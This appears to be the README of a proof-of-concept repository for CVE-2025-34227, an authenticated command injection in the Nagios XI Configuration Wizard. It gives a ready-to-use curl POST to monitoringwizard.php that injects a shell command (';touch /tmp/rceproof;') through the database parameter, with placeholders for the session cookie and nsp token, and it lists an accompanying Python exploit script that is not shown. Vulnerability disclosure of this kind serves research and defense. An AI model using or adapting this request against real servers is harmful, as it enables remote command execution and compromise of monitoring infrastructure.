Simple proof of concept repository for CVE-2025-34227 Nagios XI authenticated command injection in Configuration Wizard# CVE-2025-34227 Nagios XI Authenticated Command Injection in `Configuration Wizard`
Simple proof of concept repository for CVE-2025-34227, an authenticated command injection in Nagios XI -> `Configuration Wizard`
Full writeup here: https://theyhack.me/CVE-2025-34227-Nagios-XI-Wizard-Command-Injection/
## `curl` Proof of Concept
The payload below is in the `database` parameter: `;touch /tmp/rceproof;`.
After authenticating, add your `Cookie: nagiosxi=` session id and add your `nsp` value to the POST body:
```
$ curl -s \
-H 'Cookie: nagiosxi=<your-session-id-here>' \
--data 'update=1&nsp=<your-nsp-value-here>&step=3&nextstep=5&wizard=mysqlquery&tpl=&hostname=localhost&operation=&selectedhostconfig=&services_serial=&serviceargs_serial=&config_serial=&ip_address=127.0.0.1&port=3306&username=test&password=test&database=information_schema%3Btouch+/tmp/rceproof%3B&queryname=curl+RCE+service&query=SELECT+1&warning=50&check_interval=1&retry_interval=1&critical=200&finishButton=' \
http://192.168.122.9/nagiosxi/config/monitoringwizard.php
```
[4.0K] /data/pocs/b79333fd88ccca5a60a821bb28625b51a1454609
├── [3.5K] CVE-2025-34227.py
└── [1.0K] README.md
1 directory, 2 files